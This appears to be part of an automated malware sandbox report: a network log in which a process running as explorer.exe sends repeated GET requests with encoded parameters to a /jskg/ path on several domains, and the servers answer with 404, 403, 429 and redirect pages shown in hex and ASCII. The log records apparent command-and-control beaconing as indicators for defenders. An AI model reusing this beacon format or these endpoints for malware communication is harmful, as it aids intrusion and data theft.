Nov 21, 2023 03:33:29.744407892 CET	224	OUT	GET /jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M HTTP/1.1 Host: www.lactationdrink.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2023 03:33:30.093447924 CET	225	IN	HTTP/1.1 404 Not Found content-type: text/html cache-control: private, no-cache, max-age=0 pragma: no-cache content-length: 1236 date: Tue, 21 Nov 2023 02:33:29 GMT server: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Pleas
Nov 21, 2023 03:33:30.093483925 CET	225	IN	Data Raw: 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 Data Ascii: e be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.5	49724	167.172.69.40	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 03:33:29.744407892 CET	224	OUT	GET /jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M HTTP/1.1 Host: www.lactationdrink.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2023 03:33:30.093447924 CET	225	IN	HTTP/1.1 404 Not Found content-type: text/html cache-control: private, no-cache, max-age=0 pragma: no-cache content-length: 1236 date: Tue, 21 Nov 2023 02:33:29 GMT server: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Pleas
Nov 21, 2023 03:33:30.093483925 CET	225	IN	Data Raw: 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 Data Ascii: e be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.5	49725	34.149.87.45	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 03:33:45.473798037 CET	226	OUT	GET /jskg/?yV3lvHf=sl42yIbVTE2EkcOIsEKOUlHCBbE7QxdA6NZ7PagwYH4YR2l/R8Pf4e2TsXHmMhsmvqG9&8pbLu=d8z4X8O0M HTTP/1.1 Host: www.lbarco.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2023 03:33:45.581517935 CET	227	IN	HTTP/1.1 429 Too Many Requests Content-Length: 0 Accept-Ranges: bytes Date: Tue, 21 Nov 2023 02:33:45 GMT X-Served-By: cache-iad-kjyo7100033-IAD X-Cache: MISS X-Seen-By: yvSunuo/8ld62ehjr5B7kA== Via: 1.1 google Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	34.149.87.45	80	192.168.2.5	49725	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 03:33:45.473798037 CET	226	OUT	GET /jskg/?yV3lvHf=sl42yIbVTE2EkcOIsEKOUlHCBbE7QxdA6NZ7PagwYH4YR2l/R8Pf4e2TsXHmMhsmvqG9&8pbLu=d8z4X8O0M HTTP/1.1 Host: www.lbarco.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2023 03:33:45.581517935 CET	227	IN	HTTP/1.1 429 Too Many Requests Content-Length: 0 Accept-Ranges: bytes Date: Tue, 21 Nov 2023 02:33:45 GMT X-Served-By: cache-iad-kjyo7100033-IAD X-Cache: MISS X-Seen-By: yvSunuo/8ld62ehjr5B7kA== Via: 1.1 google Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	217.160.0.167	80	192.168.2.5	49726	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 03:34:08.968992949 CET	228	OUT	GET /jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M HTTP/1.1 Host: www.lacroixundkress.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2023 03:34:09.171339989 CET	229	IN	HTTP/1.1 302 Found Content-Type: text/html Content-Length: 0 Connection: close Date: Tue, 21 Nov 2023 02:34:09 GMT Server: Apache Cache-Control: no-cache Location: http://lacroixundkress.de/jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.5	49726	217.160.0.167	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 03:34:08.968992949 CET	228	OUT	GET /jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M HTTP/1.1 Host: www.lacroixundkress.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2023 03:34:09.171339989 CET	229	IN	HTTP/1.1 302 Found Content-Type: text/html Content-Length: 0 Connection: close Date: Tue, 21 Nov 2023 02:34:09 GMT Server: Apache Cache-Control: no-cache Location: http://lacroixundkress.de/jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49715	217.160.0.167	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 03:31:13.651241064 CET	176	OUT	GET /jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M HTTP/1.1 Host: www.lacroixundkress.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2023 03:31:13.851768017 CET	177	IN	HTTP/1.1 302 Found Content-Type: text/html Content-Length: 0 Connection: close Date: Tue, 21 Nov 2023 02:31:13 GMT Server: Apache Cache-Control: no-cache Location: http://lacroixundkress.de/jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	217.160.0.167	80	192.168.2.5	49715	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 03:31:13.651241064 CET	176	OUT	GET /jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M HTTP/1.1 Host: www.lacroixundkress.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2023 03:31:13.851768017 CET	177	IN	HTTP/1.1 302 Found Content-Type: text/html Content-Length: 0 Connection: close Date: Tue, 21 Nov 2023 02:31:13 GMT Server: Apache Cache-Control: no-cache Location: http://lacroixundkress.de/jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	23.227.38.74	80	192.168.2.5	49716	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 03:31:19.303011894 CET	178	OUT	GET /jskg/?yV3lvHf=D3ZsiJPHujYqAAcPubxypI16Ov1mNCduO0wq0OOwpknW2PP1SKlK/fdwCNTvhBS54Rsq&8pbLu=d8z4X8O0M HTTP/1.1 Host: www.saraadamchak.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2023 03:31:19.463684082 CET	179	IN	HTTP/1.1 403 Forbidden Date: Tue, 21 Nov 2023 02:31:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4515 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: max-age=15 Expires: Tue, 21 Nov 2023 02:31:34 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OJeXESvsWpjrZzOUy1Rc7a2iN2AFTLD1eAvr87EhZY1qyoaUL8DeQgfYbS2%2F45fy%2FfR%2BJLMCGgPSAnC3CtsgIz9PDF%2Fv2Svcr5EszY8hHtQRDAuw9OAnVY%2FE%2Bd75ZhOXA2OohC%2FI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Server-Timing: cfRequestDuration;dur=34.999847 Server: cloudflare CF-RAY: 82958409eace2012-IAD alt-svc: h3=":443"; ma=86400 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="
Nov 21, 2023 03:31:19.463700056 CET	180	IN	Data Raw: 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 Data Ascii: noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/
Nov 21, 2023 03:31:19.463712931 CET	182	IN	Data Raw: 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a Data Ascii: <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two">
Nov 21, 2023 03:31:19.463727951 CET	183	IN	Data Raw: 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 Data Ascii: border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">82958409eace2012</strong></span> <span class="cf-footer-separator sm:hidden">•</span> <spa
Nov 21, 2023 03:31:19.463741064 CET	183	IN	Data Raw: 0a 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f Data Ascii: </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49716	23.227.38.74	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 03:31:19.303011894 CET	178	OUT	GET /jskg/?yV3lvHf=D3ZsiJPHujYqAAcPubxypI16Ov1mNCduO0wq0OOwpknW2PP1SKlK/fdwCNTvhBS54Rsq&8pbLu=d8z4X8O0M HTTP/1.1 Host: www.saraadamchak.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2023 03:31:19.463684082 CET	179	IN	HTTP/1.1 403 Forbidden Date: Tue, 21 Nov 2023 02:31:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4515 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: max-age=15 Expires: Tue, 21 Nov 2023 02:31:34 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OJeXESvsWpjrZzOUy1Rc7a2iN2AFTLD1eAvr87EhZY1qyoaUL8DeQgfYbS2%2F45fy%2FfR%2BJLMCGgPSAnC3CtsgIz9PDF%2Fv2Svcr5EszY8hHtQRDAuw9OAnVY%2FE%2Bd75ZhOXA2OohC%2FI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Server-Timing: cfRequestDuration;dur=34.999847 Server: cloudflare CF-RAY: 82958409eace2012-IAD alt-svc: h3=":443"; ma=86400 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 